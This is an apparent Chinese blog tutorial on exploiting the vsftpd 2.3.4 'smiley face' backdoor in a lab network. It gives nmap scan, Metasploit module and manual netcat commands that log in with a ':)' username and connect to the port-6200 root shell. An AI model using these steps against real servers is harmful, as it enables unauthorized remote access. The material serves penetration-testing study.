梦の博客 欢迎来到我的破站
歌曲封面 未知作品

网站已运行 362 天 18 小时 30 分

Powered by Typecho & Sunny

2 online · 53 ms

Title

笑脸漏洞

云梦

·

Article
⚠️ 本文最后更新于2023年06月19日,已经过了313天没有更新,若内容或图片失效,请留言反馈

vsftpd程序服务端会接收来自用户输入的用户名和密码,只要用户输入的用户名中包含连续的“:”和“)”字符,就会自动在6200端口打开一个后门。

(1)扫描目标的ftp版本和6200开放情况。

♾️ abap 代码:
nmap -P0 -p21,6200 -sV 192.168.2.102
lj25ixz4.png
vsftp版本是:vsftpd 2.3.4
6200端口是关闭的。

(2)笑脸登录。

方法一:msf进行渗透测试。
(1)启动工具:

♾️ abap 代码:
msfconsole -q

(2)查询模块:

♾️ abap 代码:
search vsftp

(3)调用模块:

♾️ abap 代码:
use 0或者 use exploit/unix/ftp/vsftpd_234_backdoor

lj25rmjl.png

(4)启动攻击:
lj25wrca.png

方法二:手工注入:
(1)使用nc命令进行连接

♾️ abap 代码:
nc 192.168.2.218 21
user a:)
pass 1231232(随便输入)
lj26y584.png
挂着这个终端,开启另一个新的终端。

(2)连接6200端口

♾️ abap 代码:
nc 192.168.2.102 6200

lj26zaqz.png

现在已有 0 条评论,0 人点赞
Comment
发表
搜 索 消 息 足 迹
你还不曾留言过..
你还不曾留下足迹..
博主